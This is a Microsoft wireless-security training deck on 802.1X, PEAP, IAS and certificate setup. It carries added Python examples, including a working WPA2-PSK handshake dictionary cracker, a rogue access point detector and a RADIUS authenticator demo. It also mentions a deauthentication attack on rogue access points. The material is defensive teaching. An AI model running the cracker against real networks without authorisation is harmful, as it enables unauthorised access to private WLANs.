Implementing Security for Wireless Networks

Source: download.microsoft.com/download/e/9/d/e9d163db-5c96...


Action Items for this session
• Learn something!
• Take notes!
• Fill out that evaluation. I love to see your comments and we want to make these better!
• Most important: Have fun today!

Why should you care about wireless security?
Because "31337 h4x0r" like this: … are equipping vehicles like this: … and using tools like these: … to get info about your WLAN: … so they crack it and gain access: … so they can "ØwN jØØ" like this:

They have their own convention!

Agenda
• Overview of Wireless Solutions
• Securing a Wireless Network
• Implementing a WLAN Using Password Authentication
• Configuring Wireless Network Infrastructure Components
• Configuring Wireless Network Clients

When designing security for a wireless network consider:
• Network authentication and authorization
• Data protection
• Wireless access point configuration
• Security management

Identifying the Need to Secure a Wireless Network

The abuse is growing!

Security Threats Include:
1. Disclosure of confidential information
2. Unauthorized access to data
3. Impersonation of an authorized client
4. Interruption of the wireless service
5. Unauthorized access to the Internet
6. Accidental threats
7. Unsecured home wireless setups
8. Unauthorized WLAN implementations

Common Threats to Wireless Networks

Understanding the Standards and Technologies

Standard | Description
802.11 | A base specification that defines the transmission concepts for Wireless LANs
802.11a | Transmission speeds up to 54 megabits per second (Mbps)
802.11b | 11 Mbps; good range
802.11g | 54 Mbps; shorter range than 802.11b
802.11i (WPA2) | Establishes a standard authentication and encryption process for wireless networks
802.1X | A standard that defines a port-based access control mechanism for authenticating access to a network and, as an option, for managing the keys used to protect traffic

Wireless network implementation options include:
• Wi-Fi Protected Access with Pre-Shared Keys (WPA-PSK)
• Wireless network security using Protected Extensible Authentication Protocol (PEAP) and passwords
• Wireless network security using Certificate Services

Implementation Options

Choose the right solution

Wireless Network Solution: Wi-Fi Protected Access with Pre-Shared Keys (WPA-PSK)
  Typical environment: Small Office/Home Office (SOHO)
  Additional infrastructure components required: None
  Certificates used for client authentication: No
  Passwords used for client authentication: Yes (the WPA pre-shared key is what authenticates the client to the network)
  Typical data encryption method: WPA

Wireless Network Solution: Password-based wireless network security
  Typical environment: Small to medium organization
  Additional infrastructure components required: Internet Authentication Service (IAS); a certificate is required for the IAS server
  Certificates used for client authentication: No (a certificate is issued to the IAS server so that clients can validate it)
  Passwords used for client authentication: Yes
  Typical data encryption method: WPA or dynamic WEP

Wireless Network Solution: Certificate-based wireless network security
  Typical environment: Medium to large organization
  Additional infrastructure components required: Internet Authentication Service (IAS); Certificate Services
  Certificates used for client authentication: Yes
  Passwords used for client authentication: No (certificates are used, but the solution may be modified to require passwords)
  Typical data encryption method: WPA or dynamic WEP
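The WPA-PSK row above says the pre-shared key itself is the client's credential. That is exactly what makes the SOHO option fragile: anyone who records one 4-way handshake can test passphrases offline, which is the "crack it and gain access" step from the opening slide. The following is an added example, not code from the deck or from Microsoft; it implements the IEEE 802.11i derivation chain (PBKDF2-HMAC-SHA1 passphrase+SSID to PMK, PRF-384 to PTK, HMAC-SHA1-128 EAPOL-Key MIC for WPA2/CCMP) and runs a dictionary attack against a handshake it constructs itself. The MAC addresses, nonces, wordlist and EAPOL frame are constructed test data; the SSID CONTOSO is taken from the deck's client parameters.

```python
"""WPA-PSK key derivation and an offline dictionary attack on a 4-way handshake.

Added example; not code from the original deck. Implements the IEEE 802.11i
steps (PBKDF2 -> PMK, PRF-384 -> PTK, HMAC-SHA1-128 -> EAPOL-Key MIC) for a
WPA2-PSK/CCMP association. All MAC addresses, nonces, the wordlist and the
EAPOL frame below are constructed test data, not a real capture.
"""
import hashlib
import hmac

# Constructed handshake parameters (hypothetical addresses and nonces).
AA = bytes.fromhex("001122334455")        # authenticator (AP) MAC
SPA = bytes.fromhex("66778899aabb")       # supplicant (client) MAC
ANONCE = bytes(range(32))                 # real nonces are random; fixed here for reproducibility
SNONCE = bytes(range(32, 64))
WORDLIST = ["password", "letmein", "contoso2004", "hunter2"]  # constructed candidate list

MIC_OFFSET = 81   # EAPOL header (4) + descriptor fields up to the Key MIC field


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min/max of MACs and nonces). KCK is PTK[0:16]."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, frame_with_mic_zeroed: bytes) -> bytes:
    """Key MIC for key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 truncated to 128 bits."""
    return hmac.new(kck, frame_with_mic_zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, mic: bytes) -> bytes:
    """Construct handshake message 2 (supplicant -> AP) as an EAPOL-Key frame."""
    body = (b"\x02"            # descriptor type: RSN Key
            + b"\x01\x0a"      # key info: version 2 (HMAC-SHA1), pairwise, MIC present
            + b"\x00\x10"      # key length
            + b"\x00" * 8      # replay counter
            + snonce
            + b"\x00" * 16     # key IV
            + b"\x00" * 8      # key RSC
            + b"\x00" * 8      # reserved
            + mic
            + b"\x00\x00")     # key data length 0 (a real frame carries the RSN IE here)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def make_capture(passphrase: str, ssid: str) -> dict:
    """Simulate what a sniffer sees: MACs, both nonces and the MIC-bearing message 2."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), AA, SPA, ANONCE, SNONCE)[:16]
    mic = eapol_mic(kck, build_msg2(SNONCE, b"\x00" * 16))
    return {"ssid": ssid, "aa": AA, "spa": SPA, "anonce": ANONCE, "snonce": SNONCE,
            "msg2": build_msg2(SNONCE, mic)}


def crack(capture: dict, wordlist):
    """Offline attack: derive PMK/PTK per candidate and compare the recomputed MIC."""
    frame = capture["msg2"]
    mic = frame[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])          # the 4096-round cost is here
        kck = ptk_from_pmk(pmk, capture["aa"], capture["spa"],
                           capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), mic):
            return candidate
    return None


if __name__ == "__main__":
    cap = make_capture("contoso2004", "CONTOSO")
    print("recovered passphrase:", crack(cap, WORDLIST))
```

The PBKDF2 step is the only expensive part, and it depends on the SSID as salt, so attackers precompute PMK tables for common SSIDs. The practical takeaways for the SOHO option are a non-default SSID and a long random passphrase; for anything larger, the deck's 802.1X options remove the shared secret from the air entirely.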


Effective Authentication and Authorization

Standard | Description
Extensible Authentication Protocol-Transport Layer Security (EAP-TLS) | Uses public key certificates to authenticate clients
Protected Extensible Authentication Protocol-Microsoft Challenge Handshake Authentication Protocol v2 (PEAP-MS-CHAP v2) | A two-stage authentication method using a combination of TLS and MS-CHAP v2 for password authentication
Tunneled Transport Layer Security (TTLS) | A two-stage authentication method similar to PEAP; Microsoft does not support this method

Note: PEAP-MS-CHAP v2 is only as strong as the client's check of the server certificate in the TLS stage. A client that does not validate the server will run MS-CHAP v2 against whoever answers, so the client policy must require server certificate validation.

Wireless data encryption standards in use today include:
• Wired Equivalent Privacy (WEP)
  • Dynamic WEP, combined with 802.1X authentication, provides adequate data encryption and integrity
  • Compatible with most hardware and software devices
  • How is this a "wired equivalent"?! Trust me: WEP sucks!
  • Note: rotating keys limits how long any one WEP key is exposed, but it does not fix WEP's weak RC4 IV construction or its linear CRC-32 integrity check; treat WEP, dynamic or not, as a compatibility fallback only where WPA/WPA2 is unavailable
• Wi-Fi Protected Access (WPA/WPA2)
  • Changes the encryption key with each packet (TKIP per-packet key mixing)
  • Uses a longer (48-bit) initialization vector
  • Adds a keyed message integrity check (MIC) value
  • Incorporates an encrypted frame counter used to detect replays
  • WPA uses TKIP; WPA2 uses AES (CCMP)

Protecting WLAN Data Transmissions

System Requirements for 802.1X

Component | Requirements
Client devices | Windows XP and Pocket PC 2003 provide built-in support; Microsoft provides an 802.1X client for Windows 2000 operating systems
RADIUS/IAS and certificate servers | Windows Server 2003 Certificate Services and Windows Server 2003 Internet Authentication Service (IAS) are supported
Wireless access points | At a minimum, should support 802.1X authentication and 128-bit WEP for data encryption

• Require data protection for all wireless communications
• Require 802.1X authentication to help prevent spoofing, wardrivers, and accidental threats to your network
• Use tools to locate and shut down rogue access points on your corporate network:
  • "Over the Air": disassociation attack on rogue APs
  • "Over the Wire": automatic switch port shutdown

Guidelines for Securing Wireless Networks
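The rogue-AP guideline has a "locate" half before either shutdown technique can be applied. The following is an added example, not code or a tool from the deck: it takes a site-survey export (constructed here in the shape a scanner or controller neighbour table produces) and an inventory of authorized BSSIDs (also constructed), and separates the cases the threat list distinguishes: an unknown radio impersonating the corporate SSID (evil twin, the over-the-air candidate), a corporate AP running without 802.1X/WPA (an accidental threat to fix in the AP config), and an unknown WLAN in range (a possible unauthorized implementation, the over-the-wire candidate). The SSID CONTOSO and the security labels are assumptions.

```python
"""Flag rogue, spoofed and misconfigured access points from a site survey.

Added example; not code from the original deck. The scan below is
constructed sample data in the shape a wireless scanner or controller
neighbour table exports; the inventory of authorized BSSIDs is also
constructed. This is the "locate" half of the rogue-AP guideline; the
shutdown half (deauth over the air, switch port over the wire) is a
separate action taken on the findings.
"""
import csv
import io

# Constructed inventory: BSSID -> SSID that corporate AP is allowed to advertise.
AUTHORIZED = {
    "00:11:22:33:44:01": "CONTOSO",
    "00:11:22:33:44:02": "CONTOSO",
}
# Corporate APs must run 802.1X with WPA/WPA2; open and WEP are misconfigurations.
REQUIRED_SECURITY = {"WPA2-ENT", "WPA-ENT"}

# Constructed scan export (one beacon per line; the last row is a duplicate).
SCAN = """bssid,ssid,channel,security
00:11:22:33:44:01,CONTOSO,6,WPA2-ENT
00:11:22:33:44:02,CONTOSO,11,WEP
00:0f:66:aa:bb:cc,CONTOSO,6,OPEN
00:0f:66:aa:bb:dd,linksys,1,OPEN
00:11:22:33:44:01,CONTOSO,6,WPA2-ENT
"""

SEVERITY = {"EVIL_TWIN": 1, "WEAK_SECURITY": 2, "WRONG_SSID": 2, "UNKNOWN_AP": 3}


def analyze(scan_csv: str, authorized: dict, required_security: set) -> list:
    """Return (finding, bssid, detail) tuples, highest severity first."""
    findings = []
    seen = set()
    corporate_ssids = set(authorized.values())
    for row in csv.DictReader(io.StringIO(scan_csv)):
        bssid, ssid, security = row["bssid"].lower(), row["ssid"], row["security"].upper()
        if (bssid, ssid) in seen:
            continue  # the same AP is usually heard from several sensors
        seen.add((bssid, ssid))
        if bssid in authorized:
            if ssid != authorized[bssid]:
                findings.append(("WRONG_SSID", bssid, ssid))
            elif security not in required_security:
                # our own AP without 802.1X/WPA: an accidental threat, fix the AP config
                findings.append(("WEAK_SECURITY", bssid, security))
        elif ssid in corporate_ssids:
            # unknown radio advertising our SSID: impersonation / evil twin,
            # candidate for over-the-air shutdown
            findings.append(("EVIL_TWIN", bssid, ssid))
        else:
            # unknown WLAN in range: possibly an unauthorized AP on the wired
            # network, candidate for switch port shutdown once traced
            findings.append(("UNKNOWN_AP", bssid, ssid))
    findings.sort(key=lambda f: SEVERITY[f[0]])
    return findings


if __name__ == "__main__":
    for finding in analyze(SCAN, AUTHORIZED, REQUIRED_SECURITY):
        print(*finding)
```

The inventory check is by BSSID, not SSID, because the SSID is the one thing a rogue can copy for free; a neighbour's unrelated WLAN is ranked lowest so that the evil twin is handled first.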


Components for PEAP-MS-CHAP v2

Component | Explanation
Wireless client | Requires a WLAN adapter that supports 802.1X and dynamic WEP or WPA encryption. User and computer accounts are created in the domain.
Wireless access point | Must support 802.1X and dynamic WEP or WPA encryption. The wireless access point and RADIUS server share a secret that lets them securely identify each other.
RADIUS/IAS server | Uses Active Directory to verify the credentials of WLAN clients; makes authorization decisions based on an access policy; may also collect accounting and audit information; has a certificate installed to provide server authentication.
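The shared secret between access point and RADIUS server does real work in every exchange, not just at setup. The following is an added example, not code from the deck or from IAS: it builds the EAP-carrying Access-Request an access point sends, signs it with the HMAC-MD5 Message-Authenticator that RFC 3579 requires whenever EAP-Message is present, and shows the server side verifying it, replying with an Access-Challenge, and the access point checking the RFC 2865 Response Authenticator on the way back. A wrong secret on either side fails the check, which is why the secret must be long and random and why a RADIUS client entry with a mistyped secret simply never authenticates anyone. The secret, the Request Authenticator, the user name and the EAP payloads are constructed; a real Request Authenticator is 16 fresh random bytes per request.

```python
"""RADIUS shared secret in action: Message-Authenticator and Response Authenticator.

Added example; not code from the original deck or from IAS. Shows how the
secret configured on both the access point (RADIUS client) and the RADIUS
server lets each side verify the other's packets: the client signs an
EAP-carrying Access-Request with HMAC-MD5 (RFC 3579 Message-Authenticator),
and the server's reply carries an MD5 Response Authenticator keyed with the
same secret (RFC 2865). Secret, identities and EAP payloads are constructed.
"""
import hashlib
import hmac
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT, ACCESS_CHALLENGE = 1, 2, 3, 11
ATTR_USER_NAME, ATTR_EAP_MESSAGE, ATTR_MESSAGE_AUTHENTICATOR = 1, 79, 80
HEADER_LEN = 20  # code(1) id(1) length(2) authenticator(16)

# Constructed values. In practice the secret is long and random, and the
# Request Authenticator is 16 fresh random bytes per request.
SECRET = b"c0nstructed-ap-to-ias-secret"
REQUEST_AUTH = bytes(range(16))
EAP_RESPONSE_IDENTITY = struct.pack("!BBH", 2, 1, 9) + b"\x01" + b"user"  # EAP code 2, id 1, type 1
EAP_REQUEST_PEAP_START = struct.pack("!BBH", 1, 2, 6) + b"\x19\x20"        # type 25 (PEAP), S flag


def attr(attr_type: int, value: bytes) -> bytes:
    return bytes([attr_type, len(value) + 2]) + value


def packet(code: int, ident: int, authenticator: bytes, attrs: bytes) -> bytes:
    return struct.pack("!BBH", code, ident, HEADER_LEN + len(attrs)) + authenticator + attrs


def find_attr(pkt: bytes, attr_type: int):
    """Return (offset_of_value, value) of the first attribute of that type, or None."""
    i = HEADER_LEN
    while i + 2 <= len(pkt):
        t, length = pkt[i], pkt[i + 1]
        if length < 2 or i + length > len(pkt):
            return None  # malformed attribute list: caller treats the packet as bad
        if t == attr_type:
            return i + 2, pkt[i + 2:i + length]
        i += length
    return None


def _ma_input(pkt: bytes, off: int, request_auth: bytes) -> bytes:
    """Packet with the Request Authenticator in the authenticator field and the MA zeroed."""
    return pkt[:4] + request_auth + pkt[HEADER_LEN:off] + b"\x00" * 16 + pkt[off + 16:]


def sign(secret: bytes, pkt: bytes, request_auth: bytes) -> bytes:
    """Fill in Message-Authenticator = HMAC-MD5(secret, packet with MA zeroed).
    Replies use the Request Authenticator of the request they answer (RFC 3579 3.2)."""
    off = find_attr(pkt, ATTR_MESSAGE_AUTHENTICATOR)[0]
    mac = hmac.new(secret, _ma_input(pkt, off, request_auth), hashlib.md5).digest()
    return pkt[:off] + mac + pkt[off + 16:]


def verify_message_authenticator(secret: bytes, pkt: bytes, request_auth: bytes) -> bool:
    found = find_attr(pkt, ATTR_MESSAGE_AUTHENTICATOR)
    if found is None:
        return False  # EAP-Message without Message-Authenticator must be discarded
    off, mac = found
    expected = hmac.new(secret, _ma_input(pkt, off, request_auth), hashlib.md5).digest()
    return hmac.compare_digest(expected, mac)


def access_request(secret: bytes, ident: int, request_auth: bytes, user: bytes, eap: bytes) -> bytes:
    """Access point side: Access-Request carrying the client's EAP response."""
    attrs = (attr(ATTR_USER_NAME, user) + attr(ATTR_EAP_MESSAGE, eap)
             + attr(ATTR_MESSAGE_AUTHENTICATOR, b"\x00" * 16))
    return sign(secret, packet(ACCESS_REQUEST, ident, request_auth, attrs), request_auth)


def reply(secret: bytes, code: int, request_pkt: bytes, eap: bytes) -> bytes:
    """Server side: sign the MA first, then Response Authenticator =
    MD5(Code | ID | Length | RequestAuth | Attributes | Secret) (RFC 2865 3)."""
    request_auth = request_pkt[4:HEADER_LEN]
    attrs = attr(ATTR_EAP_MESSAGE, eap) + attr(ATTR_MESSAGE_AUTHENTICATOR, b"\x00" * 16)
    pkt = sign(secret, packet(code, request_pkt[1], request_auth, attrs), request_auth)
    response_auth = hashlib.md5(pkt[:4] + request_auth + pkt[HEADER_LEN:] + secret).digest()
    return pkt[:4] + response_auth + pkt[HEADER_LEN:]


def verify_reply(secret: bytes, request_pkt: bytes, reply_pkt: bytes) -> bool:
    """Access point side: accept the reply only if both authenticators check out."""
    request_auth = request_pkt[4:HEADER_LEN]
    expected = hashlib.md5(reply_pkt[:4] + request_auth + reply_pkt[HEADER_LEN:] + secret).digest()
    if not hmac.compare_digest(expected, reply_pkt[4:HEADER_LEN]):
        return False
    return verify_message_authenticator(secret, reply_pkt, request_auth)


def server_handle(secret: bytes, request_pkt: bytes):
    """IAS-like handling of one Access-Request: authenticate the RADIUS client, then answer."""
    if request_pkt[0] != ACCESS_REQUEST or find_attr(request_pkt, ATTR_EAP_MESSAGE) is None:
        return None
    if not verify_message_authenticator(secret, request_pkt, request_pkt[4:HEADER_LEN]):
        return None  # unknown or wrong shared secret: silently discard
    return reply(secret, ACCESS_CHALLENGE, request_pkt, EAP_REQUEST_PEAP_START)


if __name__ == "__main__":
    req = access_request(SECRET, 7, REQUEST_AUTH, b"alice@contoso.com", EAP_RESPONSE_IDENTITY)
    resp = server_handle(SECRET, req)
    print("challenge accepted by AP:", verify_reply(SECRET, req, resp))
```

Both checks are keyed MD5 constructions from the original RADIUS specifications; they authenticate the two ends to each other, but they are not encryption. The user's credential is protected by the PEAP TLS tunnel inside EAP-Message, not by RADIUS, so the RADIUS leg still belongs on a management network rather than a shared one.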


Preparing the Environment

Install the WLAN scripts using:
• Microsoft WLAN-PEAP.msi

Install the additional tools on the IAS servers:
• Group Policy Management Console
• CAPICOM
• DSACLs.exe

Configuring the Certification Authority

• The CA is used to issue computer certificates to the IAS servers
• To install Certificate Services, log on with an account that is a member of:
  • Enterprise Admins
  • Domain Admins
• Consider that Certificate Services in Windows Server 2003 Standard Edition does not provide:
  • Auto-enrollment of certificates to both computers and users
  • Version 2 certificate templates
  • Editable certificate templates
  • Archival of keys

Certificate templates available: Computer (Machine)
Drive and path of CA request files: C:\CAConfig
Length of CA key: 2048 bits
Validity period of the CA: 25 years
Validity period of issued certificates: 2 years
CRL publishing interval: 7 days
CRL overlap period: 4 days

Reviewing the CA Installation Parameters

1. Run MSSsetup CheckCAenvironment
2. Run MSSsetup InstallCA
3. Run MSSsetup VerifyCAInstall
4. Run MSSsetup ConfigureCA
5. Run MSSsetup ImportAutoenrollGPO
6. Run MSSsetup VerifyCAConfig

• You can do all this in the GUI… but why?

Installing the Certification Authority

Configuring the Certification Authority

Install CA

Configuring Post-Installation Settings

Importing the Automatic Certificate Request GPO

Verifying the Configuration

demo

Internet Authentication Service (IAS) uses Active Directory to verify and authenticate client credentials and makes authorization decisions based upon configured policies.

IAS configuration categories include:
• IAS server settings
• IAS access policies
• RADIUS logging

Configuring IAS

IAS parameters that are to be configured include:
• IAS logging to the Windows event log
• IAS RADIUS logging
• Remote access policy
• Remote access policy profile

Are we going to script this?! Yes Sir!!!

Reviewing IAS Configuration Parameters

Configuring the IAS Server

Validating the IAS Environment

Verifying IAS Server Certificate Deployment

Post-Installation Configuration Tasks

Modifying the WLAN Access Policy Profile Settings

Verifying the Connection Request Policy for WLAN

Exporting the IAS Settings

demo

Configure the basic network settings such as:
• IP configuration of the access point
• Friendly name of the access point
• Wireless network name (SSID)

Typical settings for a wireless access point include:
• Authentication parameters
• Encryption parameters
• RADIUS authentication
• RADIUS accounting

WAP Configuration Parameters

Wireless Access Point Configuration

Adding Access Points to the Initial IAS Server

Configuring Wireless Access Points

demo


Controlling WLAN Access Using Security Groups

Security Group | Default Members
Wireless LAN Access | Wireless LAN Users; Wireless LAN Computers
Wireless LAN Users | Domain Users
Wireless LAN Computers | Domain Computers

IAS enables you to control access to the wireless network using Active Directory security groups that are linked to a specific remote access policy. With the defaults above, every domain user and every domain computer is allowed onto the WLAN; if access should be narrower, replace Domain Users and Domain Computers in the two member groups with the specific groups that need wireless access.

Reviewing WLAN Client Parameters

Parameter | Setting
Group to allow WLAN access | Wireless LAN Access
Group to allow WLAN access for users | Wireless LAN Users
Group to allow WLAN access for computers | Wireless LAN Computers
WLAN GPO name | WLAN Client Settings
GPO filtering security group | Wireless LAN Computer Settings
Wireless network policy name | Windows XP WLAN Client Settings (PEAP-WEP)
WLAN network name (SSID) | CONTOSO (change this to your SSID)
EAP type | PEAP
PEAP authentication method | Secured Password (EAP-MSCHAP v2)
PEAP fast reconnect | Enabled

Creating the WLAN Client Settings GPO

Create a WLAN Client GPO Using the GPMCdemo

• There are bad people out there who want your WLAN, but you can deploy it securely!
• Determine your organization's wireless requirements
• Require 802.1X authentication
• Implement the PEAP and Passwords solution for organizations that do not utilize a PKI infrastructure
• Use the scripts provided by the PEAP and Passwords solution
• Use security groups and Group Policy to control WLAN client access
• (… and stop kidding yourself with WEP)

Session Summary

Questions and Answers

Go away for 15 minutes